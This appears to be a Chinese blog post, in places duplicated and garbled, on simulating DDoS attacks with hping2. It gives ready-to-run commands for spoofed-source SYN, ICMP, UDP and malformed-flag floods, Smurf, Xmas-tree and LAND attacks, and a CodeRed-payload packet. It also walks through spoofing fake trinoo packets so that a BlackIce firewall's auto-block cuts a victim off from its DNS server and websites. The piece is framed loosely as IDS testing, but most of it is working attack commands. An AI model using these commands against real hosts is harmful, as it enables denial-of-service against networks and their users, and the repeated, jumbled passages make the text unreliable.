使用 Hping 模擬 DDos 攻擊 (这个可以在snort上试一试)
安裝hping (建議將hping2.0.0-rc1.tar.gz檔案放在 /usr/local下)
# tar zxvf hping2.0.0-rc1.tar.gz
# cd hping2
# ./configure
# make
# make install
安裝hping (建議將hping2.0.0-rc1.tar.gz檔案放在 /usr/local下)
# tar zxvf hping2.0.0-rc1.tar.gz
# cd hping2
# ./configure
# make
# make install
要看說明,可以輸入 hping2 --help
下面是一些常用的方法
hping www.abc.net.tw -1 -i u100000 -a 100.100.100.100
每秒送10個(-i u10000)ICMP(-1)封包到www.abc.net.tw 偽造來源IP(-a)為100.100.100.100
每秒送10個(-i u10000)ICMP(-1)封包到www.abc.net.tw 偽造來源IP(-a)為100.100.100.100
註:-1為數字非英文
hping www.abc.net.tw –i u1000000 –a 100.100.100.100 –s 22222 –p 44444
每秒送1個(-i u1000000)TCP(default)封包到www.abc.net.tw的port 44444,偽造來源IP(-a)100.100.100.100使用的port為22222
測試1: SYN Flooding(每秒10個封包)
hping 目標主機IP –i u100000 –S –a 偽造來源IP
每秒送1個(-i u1000000)TCP(default)封包到www.abc.net.tw的port 44444,偽造來源IP(-a)100.100.100.100使用的port為22222
測試1: SYN Flooding(每秒10個封包)
hping 目標主機IP –i u100000 –S –a 偽造來源IP
測試2 :偽造IP的ICMP封包(每秒10個封包)
hping 目標主機IP –i u100000 –1 –a 偽造來源IP
註:-1為數字非英文
hping 目標主機IP –i u100000 –1 –a 偽造來源IP
註:-1為數字非英文
測試3:不正常TCP Flag組合封包(每秒10個封包)
(a)SYN+FIN
hping 目標主機IP –i u100000 –S –F –a 偽造來源IP
(b)X’mas
hping 目標主機IP –i u100000 –F –S –R –P –A –U –a 偽造來源IP
測試4:偽造IP的UDP封包
hping目標主機IP –i u100000 –2 –a 偽造來源IP
(a)SYN+FIN
hping 目標主機IP –i u100000 –S –F –a 偽造來源IP
(b)X’mas
hping 目標主機IP –i u100000 –F –S –R –P –A –U –a 偽造來源IP
測試4:偽造IP的UDP封包
hping目標主機IP –i u100000 –2 –a 偽造來源IP
測試5:偽造IP內含CodeRed封包
hping 目標主機IP –i u100000 –d [封包datasize] –E [filename] –a [偽造來源IP]
hping 目標主機IP –i u100000 –d [封包datasize] –E [filename] –a [偽造來源IP]
Hping2 构造数据包
SMURF攻击
hping2 -1 -a 192.168.1.5 192.168.1.255
XMAS TREE攻击
hping2 -SFRP 192.168.1.5
LAND攻击
hping2 -k -S -s 25 -p 25 -a 192.168.1.5 192.168.1.5
Extra:
用tcpdump记录流量
cron任务: 5 3 * * * /usr/sbin/tcpdump -c 25000 -w dumpfile -n
查看记录: tcpdump -r dumpfile -X -vv
SMURF攻击
hping2 -1 -a 192.168.1.5 192.168.1.255
XMAS TREE攻击
hping2 -SFRP 192.168.1.5
LAND攻击
hping2 -k -S -s 25 -p 25 -a 192.168.1.5 192.168.1.5
Extra:
用tcpdump记录流量
cron任务: 5 3 * * * /usr/sbin/tcpdump -c 25000 -w dumpfile -n
查看记录: tcpdump -r dumpfile -X -vv
我们可以来个实际的例子:
step 1:目标主机安装了blackice,它的 ip address是 ip.add.of.victim
step 2:发起攻击的一太linux 机器,上面安装了hping
执行如下命令
---
[root@yiminggong]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add. of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@yiminggong]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@ yiminggong]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.sina.com
+ 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@ yiminggong]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.sina.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms
---
上面的三个命令干了同一件事情,以伪造的ip发送假的trinoo攻击数据包.
结果:在目标主机上所有伪造的ip地址网络连接被block了,也就是对目标主机ip.add.of.victim而言,它的dns服务器,google和sina都无法访问了。
我很怀疑目前的个人防火墙只要存在auto-block功能,就存在这一问题。
+ 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms
---
上面的三个命令干了同一件事情,以伪造的ip发送假的trinoo攻击数据包.
结果:在目标主机上所有伪造的ip地址网络连接被block了,也就是对目标主机ip.add.of.victim而言,它的dns服务器,google和sina都无法访问了。
我很怀疑目前的个人防火墙只要存在auto-block功能,就存在这一问题。
没有评论:
发表评论